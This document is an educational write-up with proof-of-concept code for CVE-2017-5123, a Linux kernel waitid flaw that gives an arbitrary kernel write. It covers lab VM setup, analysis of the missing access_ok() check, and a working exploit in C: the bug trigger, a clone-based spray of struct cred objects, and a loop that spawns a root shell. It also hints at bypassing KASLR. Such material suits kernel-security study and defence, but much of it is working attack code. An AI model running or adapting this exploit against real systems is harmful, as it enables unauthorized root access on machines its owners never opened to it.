
CVE-2017-5123

PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR

The waitid implementation in upstream kernels did not restrict the target destination to copy information results. This can allow local users to write to otherwise protected kernel memory, which can lead to privilege escalation.

Introduction

In this little writeup, I will analyze a kernel vulnerability that allows us to obtain root privileges.

This file is divided into four parts:

  1. VM setup;
  2. vulnerability analysis;
  3. exploitation;
  4. PoC.

I want to point out that there are many better ways to exploit this CVE: this is just a PoC for learning about the kernel and is not meant to be used in the wild. Still, I think this methodology is a useful introduction to kernel exploitation.

VM Setup

Kernel Build

This vulnerability was introduced in commit 4c48abe91be0, so we need to build a kernel version that contains it.

This can be a little tricky because this is an old version and the code needs some patching before it builds. I made a repository with already patched kernel code and a .config file, so you can just clone and build:

git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse

Note that this kernel is built with virtio drivers, so we can use a virtio (9p) shared folder to exchange files with the VM.

Rootfs Setup

Now, we will create the initial rootfs:

qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw 
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1

Then, we should install a basic Linux distribution, for example using pacstrap or debootstrap.

sudo pacstrap /tmp/mount1 base base-devel vim

Finally, we can modify the system:

# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow 
# mount the 9p share exported by qemu (mount_tag=/transient) to exchange files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared 
# It is useful to have passwordless sudo (the test user is added to the wheel group below)
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group

sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1

If everything is in order, we can now boot our test system with qemu (the shared directory ./trans_fs must exist on the host; -s starts a gdb server on TCP port 1234):

qemu-system-x86_64 \
    -kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
    -hda ./hda.raw \
    -m 4G \
    -cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
    -smp 4 \
    -vga virtio \
    -enable-kvm \
    -nographic \
    -machine type=q35,accel=kvm \
    -virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
    -append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
    -chardev "vc,id=vc.0,cols=1920,rows=1080" \
    -net "user,hostfwd=tcp::10022-:22" \
    -net "nic" \
    -s

Vulnerability

The description of the CVE says that there is an unrestricted write operation during the waitid system call.

Let's open kernel/exit.c and look at the code:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
		infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;
    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

This function is pretty straightforward: after calling kernel_waitid() and a few checks, it writes the results into infop with a series of unsafe_put_user(...) calls and returns.

Most of this function consists of unsafe_put_user(...) calls, so let's look at that macro (arch/x86/include/asm/uaccess.h):

/*
 * The "unsafe" user accesses aren't really "unsafe", but the naming
 * is a big fat warning: you have to not only do the access_ok()
 * checking before using them, but you have to surround them with the
 * user_access_begin/end() pair.
 */
#define user_access_begin()	__uaccess_begin()
#define user_access_end()	__uaccess_end()

#define unsafe_put_user(x, ptr, err_label)					\
do {										\
    int __pu_err;								\
    __typeof__(*(ptr)) __pu_val = (x);					\
    __put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT);	\
    if (unlikely(__pu_err)) goto err_label;					\
} while (0)

#define unsafe_get_user(x, ptr, err_label)					\
do {										\
    int __gu_err;								\
    __inttype(*(ptr)) __gu_val;						\
    __get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT);	\
    (x) = (__force __typeof__(*(ptr)))__gu_val;				\
    if (unlikely(__gu_err)) goto err_label;					\
} while (0)

There is a big fat warning in the comment: if you want to use unsafe_put/get_user you should first call access_ok() and surround them with user_access_begin/end().

Looking back at waitid, we can see that access_ok() is never called on infop, so the system call violates this rule.

But what are those macros?

SMAP/SMEP

SMAP and SMEP are two security features that make exploits harder to write. Note that they are enforced by the CPU itself; the kernel enables them through bits in the CR4 register.

SMEP prevents the CPU from executing userspace code while in supervisor mode; SMAP, instead, blocks supervisor-mode reads and writes to user memory.

The kernel still needs to read and write user memory, and this can be done in two ways:

  1. with helper functions (e.g. copy_from_user/copy_to_user) that validate the pointer and copy the data between kernel and user space;
  2. by temporarily disabling SMAP and accessing user memory directly.

As the definition of unsafe_put_user shows, this macro only stores the value of x into the memory pointed to by ptr (and jumps to err_label on a fault). Since SMAP blocks kernel accesses to user memory, these macros must be wrapped between user_access_begin/end().

#define __uaccess_begin() stac()
#define __uaccess_end()   clac()

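As we can see, user_access_begin/end() simply expand to the stac and clac instructions.

stac sets the AC flag in EFLAGS, which suspends SMAP checks, and clac clears it again. In other words, user_access_begin() temporarily disables SMAP and user_access_end() re-enables it.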

The previous "warning" also mentions the access_ok() macro:

/**
 * access_ok: - Checks if a user space pointer is valid
 * @type: Type of access: %VERIFY_READ or %VERIFY_WRITE.  Note that
 *        %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
 *        to write to a block, it is always safe to read from it.
 * @addr: User space pointer to start of block to check
 * @size: Size of block to check
 *
 * Context: User context only. This function may sleep if pagefaults are
 *          enabled.
 *
 * Checks if a pointer to a block of memory in user space is valid.
 *
 * Returns true (nonzero) if the memory block may be valid, false (zero)
 * if it is definitely invalid.
 *
 * Note that, depending on architecture, this function probably just
 * checks that the pointer is in the user space range - after calling
 * this function, memory access functions may still return -EFAULT.
 */
#define access_ok(type, addr, size)					\
({									\
	WARN_ON_IN_IRQ();						\
	likely(!__range_not_ok(addr, size, user_addr_max()));		\
})

The comment is self-explanatory: the macro checks that the block [addr, addr + size) lies entirely in the user address space, i.e. below user_addr_max().

Arbitrary write

Let's take another look at the waitid code:

	user_access_begin();
	unsafe_put_user(signo, &infop->si_signo, Efault);
	unsafe_put_user(0, &infop->si_errno, Efault);
	unsafe_put_user(info.cause, &infop->si_code, Efault);
	unsafe_put_user(info.pid, &infop->si_pid, Efault);
	unsafe_put_user(info.uid, &infop->si_uid, Efault);
	unsafe_put_user(info.status, &infop->si_status, Efault);
	user_access_end();

As you may have guessed, since access_ok() is never called and the infop pointer is completely controlled by the attacker, nothing stops infop from pointing into kernel memory: we get a write to an arbitrary address.

Trigger the bug

It's really easy to reach the vulnerable path, and we can trigger it with this simple code:

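#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

volatile int thread_ready;   // written by the child, polled by the parent
int die_thread(void *arg){
    thread_ready=1;
    syscall(__NR_sched_yield);
    return 0;                // the child exits with status 0
}
void *stack;                 // top of a malloc'd stack for the child, set up by the caller
int trigger_bug(uint64_t where, int what){  // 'what' is unused: waitid decides the values
  printf("[0] Trying to overwrite 0x%016lx\r", (unsigned long)where);
  //int pid = fork(); // It is also possible to use fork syscall
  thread_ready = 0;
  int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | SIGCHLD, NULL);
  int err;
  while(thread_ready == 0) {syscall(__NR_sched_yield);} // wait for the child to start
  // infop = where: waitid stores the siginfo fields there without any access_ok() check
  err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);
  return err;
}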

This code triggers the vulnerability and writes the siginfo fields to the memory pointed to by where.

We can use gdb to check this trigger: for example, we can pick an arbitrary address and use the trigger_bug function to overwrite it.

Exploitation

This vulnerability can be exploited in various ways, but I prefer a very simple approach.

Remember that we can write anywhere we want, but the written data is only partially controlled. In particular, si_errno is always written as 0, so we can overwrite a 4-byte value with 0.

The basic idea is to overwrite the UID of our process and become root, but first we need to understand what credentials are in Linux.

Fork

Let's start by digging into the fork system call, which is used to create new processes.

We can check the code in kernel/fork.c:

SYSCALL_DEFINE0(fork)
{
	return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}

So, fork system call is simply a wrapper for _do_fork with hardcoded parameters.

This last function is a bit long but we can summarize it in this way:

long _do_fork(unsigned long clone_flags,
	      unsigned long stack_start,
	      unsigned long stack_size,
	      int __user *parent_tidptr,
	      int __user *child_tidptr,
	      unsigned long tls)
{
	struct task_struct *p;
	int trace = 0;
	long nr;
  ......

  // This will create another task struct but it will NOT start the process. 
	p = copy_process(clone_flags, stack_start, stack_size,
			 child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
	add_latent_entropy();
  ......
    // Wake up the newly created task: this sets its state to TASK_RUNNING and enqueues it on a runqueue
		wake_up_new_task(p);
  ......
		put_pid(pid);
	} else {
		nr = PTR_ERR(p);
	}
	return nr;
}

Through copy_process(), this function allocates a new task_struct object. Although this structure is really important (it describes a process), we will focus on its credential fields:

...
	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;
  ...

As we can see, there are three pointers to struct cred. Let's see how this structure is composed (include/linux/cred.h):

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
  ......

As we can see, the UID of a process is just an unsigned integer (kuid_t is a struct wrapping a uid_t), so we can overwrite this value with 0 in order to become root.

Copy_process

The task_struct structure is allocated in the copy_process function, which is a bit complex: its main goal is to "copy" the current process into a new one.

We can focus on the copy_creds(p, clone_flags) call, which is defined as:

/*
 * Copy credentials for the new process created by fork()
 *
 * We share if we can, but under some circumstances we have to generate a new
 * set.
 *
 * The new process gets the current process's subjective credentials as its
 * objective and subjective credentials
 */
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
	struct cred *new;
	int ret;

	if (
#ifdef CONFIG_KEYS
		!p->cred->thread_keyring &&
#endif
		clone_flags & CLONE_THREAD
	    ) {
		p->real_cred = get_cred(p->cred);
		get_cred(p->cred);
		alter_cred_subscribers(p->cred, 2);
		kdebug("share_creds(%p{%d,%d})",
		       p->cred, atomic_read(&p->cred->usage),
		       read_cred_subscribers(p->cred));
		atomic_inc(&p->cred->user->processes);
		return 0;
	}

	new = prepare_creds();
	if (!new)
		return -ENOMEM;

	if (clone_flags & CLONE_NEWUSER) {
		ret = create_user_ns(new);
		if (ret < 0)
			goto error_put;
	}

.........

error_put:
	put_cred(new);
	return ret;
}

As we can see, this function calls prepare_creds, where the actual allocation is performed (from the cred_jar slab cache).

We now have a path to allocate an (almost) arbitrary number of struct cred objects:

  1. _do_fork()
  2. copy_process()
  3. copy_creds()

Our last problem is how to reach _do_fork() from userspace. We could use fork, but it can be slow (the child gets its own copy of the address space), so we will use clone with CLONE_VM instead.

Note: we can't use pthreads because of the clone flags: in copy_creds, when CLONE_THREAD is set (as it is for pthread_create), the child shares the parent's credentials and no new struct cred is allocated.

Put it all togheter

Now, a little recap:

  1. we are able to trigger the bug and write to memory;
  2. we know that we can write 0 to memory;
  3. we know that if we overwrite the UID of one process with 0, it obtains root permissions.

Now we need to know where to write. Although KASLR is disabled, the address of a given struct cred is not stable enough, so I decided to proceed with memory spraying.

Spraying

We need to locate struct cred objects in memory in order to identify a range of candidate addresses. We can use gdb's Python API with a script like this:

....
for task in task_lists():
    #gdb.write("{address} {pid} {comm}\n".format(
    #    address=task,
    #    pid=task["pid"],
    #    comm=task["comm"].string()))
    comm = task["comm"].string()
    # Insert your executable name
    if comm == "exploit":
        print(task['cred'])
....

Note: this script works only with KASLR disabled and with debug symbols (we need the init_task symbol). After a few runs, we can see that the heap grows downward, so we can start from a lower address and move up.

Now we can use the clone system call to spawn a lot of processes and, thanks to gdb, check the resulting addresses:

stack = (char *)malloc(STACK_SIZE) + STACK_SIZE;    // stack for trigger_bug()'s child
for (x = 0; x < MAX_THREADS; x++) {
    char *stackBase = malloc(STACK_SIZE);
    if (!stackBase) {                                // check before computing the top
      perror("[-] Malloc");
      return -1;
    }
    stackTop = stackBase + STACK_SIZE;               // stacks grow down: pass the top
    // spray_thread function can simply be an infinite loop
    pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | SIGCHLD, NULL);
    if (pid == -1) {
      perror("\n\nCLONE");
      return -1;
    }
    printf("[0] Process created: %d\r", x);
}

Note: you may not be able to spawn more than about 4k processes. If this is the case, check the process limit with ulimit -u (RLIMIT_NPROC).

PoC

Finally, we can write our PoC.

It is enough to call trigger_bug with different addresses (searching for a struct cred) while each sprayed thread keeps checking its own UID, like this:

struct shared_area{
  volatile int one_win;   // shared by all threads (CLONE_VM)
};
struct shared_area glob_var;

// Sprayed thread
int spray_thread(void *arg){
  int uid;
  int previous_one = syscall(__NR_getuid);
  // Loop over the getuid syscall
  while(1){
    uid = syscall(__NR_getuid);
    //printf("UID: %d\n",uid);
    // If the returned UID differs from the previous one, the write has hit our struct cred
    if (uid != previous_one){
      printf("WIN!! with %d\n", uid);
      // Tell the other threads to stop, in order to stabilize the system
      glob_var.one_win = 1;
      // Simply spawn a shell
      system("/bin/sh");
    }
    if(glob_var.one_win == 1)
      return 1;
  }
  return 0;
}

The chance of hitting the structure is about 50% per run, so after a few runs you should obtain root privileges.

Root

Conclusion

This is a (basic) PoC and the spraying is far from perfect. It is just an "introduction" to the amazing world of the kernel: I skipped a lot of concepts that are extremely important (like memory management). If you want to dig deeper, take a look at prepare_creds and the memory allocations.

KASLR is disabled here, but this vulnerability can be used to bypass that mitigation as well (unsafe_put_user doesn't crash on an invalid address, it just returns -EFAULT). However, I don't think adding another layer of brute forcing is useful if your goal is to learn the kernel. If you want to use this vulnerability in the wild, you should write a different exploit (at the very least, a different spraying strategy).

Food for thought: I also used this vulnerability to understand and try the ret2dir technique (hint: you can trigger the write through the kernel alias (physmap) address and read the modification through the userspace address).

Reference